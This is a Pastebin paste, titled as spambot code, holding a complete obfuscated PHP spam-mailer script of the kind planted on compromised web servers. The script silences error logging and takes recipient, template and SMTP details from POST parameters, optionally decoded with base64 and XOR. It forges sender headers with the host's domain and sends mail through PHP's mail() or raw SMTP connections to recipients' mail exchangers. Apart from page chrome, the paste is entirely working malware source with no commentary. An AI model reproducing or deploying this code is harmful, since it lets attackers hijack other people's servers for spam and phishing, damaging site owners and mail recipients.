daily pastebin goal
51%
SHARE
TWEET

spambot spam obfuscated code

a guest Nov 14th, 2012 365 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @error_reporting(0);
  3. @ini_set('error_log',NULL);
  4. @ini_set('log_errors',0);
  5. @set_magic_quotes_runtime(0);
  6. if (count($_POST) < 2) {
  7.         die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));
  8.  }
  9.  $BoolSwitch = false;
  10.  foreach (array_keys($_POST) as $v3c6e0b8a) {
  11.          switch ($v3c6e0b8a[0])
  12.          { case chr(108): $vd56b6998 = $v3c6e0b8a;
  13.          break;
  14.          case chr(100): $v8d777f38 = $v3c6e0b8a;
  15.          break;
  16.          case chr(109): $v3d26b0b1 = $v3c6e0b8a;
  17.          break;
  18.          case chr(101); $BoolSwitch = true;
  19.          break; }
  20.           }
  21. if ($vd56b6998 === '' || $v8d777f38 === '')
  22. die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
  23.  
  24. $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
  25. $v01b6e203 = @$_POST[$vd56b6998];
  26. $v8d777f38 = @$_POST[$v8d777f38];
  27. $v3d26b0b1 = @$_POST[$v3d26b0b1];
  28. if ($BoolSwitch) { $v01b6e203 = n9a2d8ce3($v01b6e203);
  29. $v8d777f38 = n9a2d8ce3($v8d777f38);
  30. $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); }
  31. $v01b6e203 = urldecode(stripslashes($v01b6e203));
  32. $v8d777f38 = urldecode(stripslashes($v8d777f38));
  33. $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
  34. if (strpos($v01b6e203, ';', 1) != false)
  35. { list($va3da707b, $vbfbb12dc, $v081bde0c) = split(';',strtolower($v01b6e203));
  36.  $va3da707b = ucfirst($va3da707b);
  37.  $vbfbb12dc = ucfirst($vbfbb12dc);
  38.  $v3a5939e4 = next(explode('@', $v081bde0c));
  39.  if ($vbfbb12dc == '' or $va3da707b == '')
  40.  { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; }
  41.  else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } }
  42.  else { $vbfbb12dc = $va3da707b = '';
  43.  $v081bde0c = strtolower($v01b6e203);
  44.  $v3a5939e4 = next(explode('@', $v01b6e203));
  45.  }
  46.  preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
  47.  $vee11cbb1 = $vee11cbb1[1];
  48.  preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
  49.  $vb068931c = $vb068931c[1];
  50.  preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
  51.  $vc34487c9 = $vc34487c9[1];
  52.  preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
  53.  $v6f4b5f42= $v6f4b5f42[1];
  54.  $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
  55.  $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
  56.  $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
  57.  $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
  58.  $v0897acf4 = preg_replace('/^www\./i', '', @$_SERVER['HTTP_HOST']);
  59.  if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false;
  60.  else $v10497e3f = true;
  61.  if ($v10497e3f) $v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
  62.  else $v9a5cb5d8 = "$vee11cbb1@[$v0897acf4]";
  63.  if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
  64.  else $vd98a07f8 = $v9a5cb5d8;
  65.  $vb8ddc93f = "From: $vd98a07f8\r\n";
  66.  $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
  67.  $v3c87b187 = "X-Priority: 3 (Normal)\r\n";
  68.  $v3c87b187 .= "MIME-Version: 1.0\r\n";
  69.  $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
  70.  $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
  71.  if (!in_array('mail', $v619d75f8)) {
  72.          if ($v10497e3f) {
  73.                   if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8"))
  74.                    die(chr(79).chr(75).md5(1234567890)."+0"); }
  75.                    else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187))
  76.                    die(chr(79).chr(75).md5(1234567890)."+0"); } }
  77.                    $v4340fd73 = "Date: " . date("D, j M Y G:i:s O")."\r\n" .
  78.                    $vb8ddc93f; $v4340fd73 .= "Message-ID: <".
  79.                    preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n";
  80.                     $v4340fd73 .= "To: $v01b6e203\r\n";
  81.                      $v4340fd73 .= "Subject: $vc34487c9\r\n";
  82.                      $v4340fd73 .= $v3c87b187;
  83.                      $v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
  84.                      if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4);
  85.                      if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
  86.                                  die(chr(79).chr(75).md5(1234567890)."+1"); }
  87.                                  else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; }
  88.                                  function ne667da76($v957b527b){
  89.                                          return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); }
  90.                                          function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false)
  91.                                          { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = '';
  92.                                          for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
  93.                                                  if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; }
  94.                                                  $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
  95.                                                  if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
  96.                                                          if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0);
  97.                                                          $v11a95b8a = 0;
  98.                                                          continue; }
  99.                                                          $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
  100.                                                          $v11a95b8a += 3;
  101.                                                          continue; }
  102.                                                          $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++;
  103.                                                          }
  104.                                                          return $vb4a88417;
  105.                                                          }
  106.                                                          function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) {
  107.                                                                  global $v619d75f8;
  108.                                                                  if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
  109.                                                                  elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
  110.                                                                  elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
  111.                                                                  else return -1;
  112.                                                                  if (!$v66b18866) { return 1; }
  113.                                                                  else { $v8d777f38 = n54070395($v66b18866);
  114.                                                                  @fputs($v66b18866, "EHLO $v0897acf4\r\n");
  115.                                                                  $vc1336794 = substr(n54070395($v66b18866), 0, 3);
  116.                                                                  if($vc1336794 != 250) return 2;
  117.                                                                  @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
  118.                                                                  $vc1336794 = substr(n54070395($v66b18866), 0, 3);
  119.                                                                  if($vc1336794 != 250) return 3;
  120.                                                                  @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
  121.                                                                  $vc1336794 = substr(n54070395($v66b18866), 0, 3);
  122.                                                                  if($vc1336794 != 250 && $vc1336794 != 251) return 4;
  123.                                                                  @fputs($v66b18866, "DATA\r\n");
  124.                                                                  $vc1336794 = substr(n54070395($v66b18866), 0, 3);
  125.                                                                  if($vc1336794 != 354) return 5;
  126.                                                                  @fputs($v66b18866, $v841a2d68."\r\n.\r\n");
  127.                                                                  $vc1336794 = substr(n54070395($v66b18866), 0, 3);
  128.                                                                  if($vc1336794 != 250) return 6; @fputs($v66b18866, "QUIT\r\n");
  129.                                                                  @fclose($v66b18866); return 0; } }
  130.                                                                  function n54070395($v66b18866) {
  131.                                                                          $v8d777f38 = '';
  132.                                                                          while($v341be97d = @fgets($v66b18866, 515)) {
  133.                                                                                  $v8d777f38 .= $v341be97d;
  134.                                                                                  if(substr($v341be97d, 3, 1) == ' ')
  135.                                                                                  break; }
  136.                                                                                  return $v8d777f38; }
  137.                                                                                   function n9c812bad($vad5f82e8) {
  138.                                                                                           global $v619d75f8;
  139.                                                                                           if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
  140.                                                                                                   @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
  141.                                                                                                   if (count($v744fa43b) === 0) return '127.0.0.1';
  142.                                                                                                   $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
  143.                                                                                                   return $v744fa43b[$v865c0c0b[0]]; }
  144.                                                                                                   else { return '127.0.0.1'; } }
  145.                                                                                                   function n9a2d8ce3($v1cb251ec) {
  146.                                                                                                           $v1cb251ec = base64_decode($v1cb251ec);
  147.                                                                                                           $vc68271a6 = '';
  148.                                                                                                           for($v865c0c0b = 0;
  149.                                                                                                           $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
  150.                                                                                                           $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
  151.                                                                                                           return $vc68271a6; }
  152.                                                                                                          
  153.                                                                                                            ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top